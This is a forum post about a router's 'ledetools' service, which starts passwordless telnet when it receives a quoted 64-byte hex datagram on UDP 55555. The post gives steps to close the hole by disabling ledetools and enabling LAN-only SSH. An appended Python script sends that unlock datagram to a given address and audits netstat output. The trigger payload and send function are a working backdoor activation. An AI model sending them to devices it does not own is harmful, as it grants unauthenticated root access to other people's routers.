Looking for information about firmware on modem

OK, I've worked on this a bit more.

There is a service called ledetools that handles listening on UDP port 55555. When it gets the right data (the hex is a few posts above), it runs telnetd. telnetd also seems to listen on UDP port 55555 as well as the normal TCP 23. Either way, these are both unauthenticated and listen on the WAN port - not great.

I've disabled the 55555 "feature" and enabled dropbear SSH listening only on the LAN side.

Use Packet Sender or whatever you like to send this hex to UDP port 55555 on the router:

    0d 7d 74 6f ca 70 e8 0e ac 3f ec 1b d8 25 5a 98 8f 18 af 35 a4 58 19 ed 52 08 47 4b f5 63 ea 97 99 f0 dc 69 f5 f8 90 11 81 9b cd 05 94 0f 08 43 9e cd 62 38 d3 b3 ee 7f d9 32 bb 5e 5d 0c ac 21

Now you should be able to telnet in with no password.

Add these lines to /etc/config/dropbear:

    option enable '1'
    option Interface 'lan'

In /etc/init.d/dropbear, uncomment the START and STOP lines and change START (not sure if this is necessary, but I did it to make sure dropbear started up after the network interfaces):

    #START=50
    #STOP=50

change to

    START=99
    STOP=50

Run "/etc/init.d/dropbear enable".

Restart the router, verify you can get in with SSH and that it is only listening on the LAN IP:

    root@CAP:~# netstat -anp | grep drop
    tcp 0 0 10.10.0.1:22 0.0.0.0:* LISTEN 3177/dropbear
    tcp 0 0 10.10.0.1:22 10.10.0.2:53060 ESTABLISHED 4326/dropbear

Run "/etc/init.d/ledetools disable".

Restart the router, go back in with SSH and verify nothing is listening on 55555:

    netstat -an | grep 55555

I'm guessing using the restore feature will probably undo all of this.

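As an added example (not part of the post above and not any tooling from the router or its vendor), the following Python script does the two things the post describes by hand: it sends the quoted 64-byte datagram to UDP 55555 and checks whether telnet (TCP 23) comes up, and it audits a `netstat -anp` listing for the end state the post wants (dropbear bound to the LAN IP only, nothing at all on 23 or 55555). The `netstat` sample lines for the "before" state, the process names `ledetools`/`telnetd`, and the default router address `192.168.1.1` are constructed for illustration; the "after" lines mirror the post's own output.

```python
#!/usr/bin/env python3
"""Added example: send the ledetools unlock datagram, then audit listening sockets.

Not from the original post or the router's firmware. Sample netstat text, the
process names in it and the default router address are assumptions.
"""
import socket
import sys

# The 64-byte payload quoted in the post; ledetools starts telnetd when it sees it.
UNLOCK_HEX = (
    "0d 7d 74 6f ca 70 e8 0e ac 3f ec 1b d8 25 5a 98 "
    "8f 18 af 35 a4 58 19 ed 52 08 47 4b f5 63 ea 97 "
    "99 f0 dc 69 f5 f8 90 11 81 9b cd 05 94 0f 08 43 "
    "9e cd 62 38 d3 b3 ee 7f d9 32 bb 5e 5d 0c ac 21"
)
BACKDOOR_PORTS = {23, 55555}  # telnet and the ledetools trigger port


def unlock_payload():
    """Raw bytes of the unlock datagram (bytes.fromhex ignores the spaces)."""
    return bytes.fromhex(UNLOCK_HEX)


def tcp_open(host, port, timeout=2.0):
    """True if a TCP connect to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_unlock(host, port=55555, timeout=2.0):
    """Send the datagram and report whether telnet (TCP 23) answers afterwards."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(unlock_payload(), (host, port))
    return tcp_open(host, 23, timeout)


def parse_netstat(text):
    """Parse busybox `netstat -anp` style lines; only tcp/udp rows are kept.

    UDP rows have no state column, so the program is simply the last field
    when it looks like 'pid/name'."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or not f[0].startswith(("tcp", "udp")):
            continue
        ip, _, port = f[3].rpartition(":")
        state = f[5] if f[0].startswith("tcp") and len(f) > 5 else ""
        prog = f[-1] if "/" in f[-1] else ""
        rows.append({"proto": f[0], "ip": ip, "port": int(port),
                     "state": state, "prog": prog})
    return rows


def listeners(rows):
    """Sockets that accept input: LISTEN for tcp, every bound socket for udp."""
    return [r for r in rows if r["proto"].startswith("udp") or r["state"] == "LISTEN"]


def audit(text, lan_ip):
    """Listeners that violate the post's end state.

    'backdoor': anything on 23 or 55555, whatever the protocol.
    'wan':      anything not bound to the LAN IP or loopback. A socket on
                0.0.0.0 / :: is bound to every interface, WAN included, so
                unless a firewall rule drops it, it is reachable from outside."""
    bad = {"backdoor": [], "wan": []}
    for r in listeners(parse_netstat(text)):
        if r["port"] in BACKDOOR_PORTS:
            bad["backdoor"].append(r)
        if r["ip"] not in (lan_ip, "127.0.0.1", "::1"):
            bad["wan"].append(r)
    return bad


# Constructed netstat output for the two states; the AFTER lines mirror the post.
BEFORE = """\
udp        0      0 0.0.0.0:55555           0.0.0.0:*                           1201/ledetools
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      1330/telnetd
"""
AFTER = """\
tcp        0      0 10.10.0.1:22            0.0.0.0:*               LISTEN      3177/dropbear
tcp        0      0 10.10.0.1:22            10.10.0.2:53060         ESTABLISHED 4326/dropbear
"""

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        print(label, audit(text, "10.10.0.1"))
    if len(sys.argv) > 1:  # e.g. ./unlock_audit.py 192.168.1.1 (assumed router address)
        print("telnet up after unlock:", send_unlock(sys.argv[1]))
```

Run it with no arguments to see the audit on the sample text; pass the router's address to actually send the datagram. To audit a live box, pipe `netstat -anp` over SSH into `audit()` and treat any non-empty list as a failed check, including `wan` entries on ports other than 22, since those are what the WAN side can reach regardless of whether they are the ledetools backdoor.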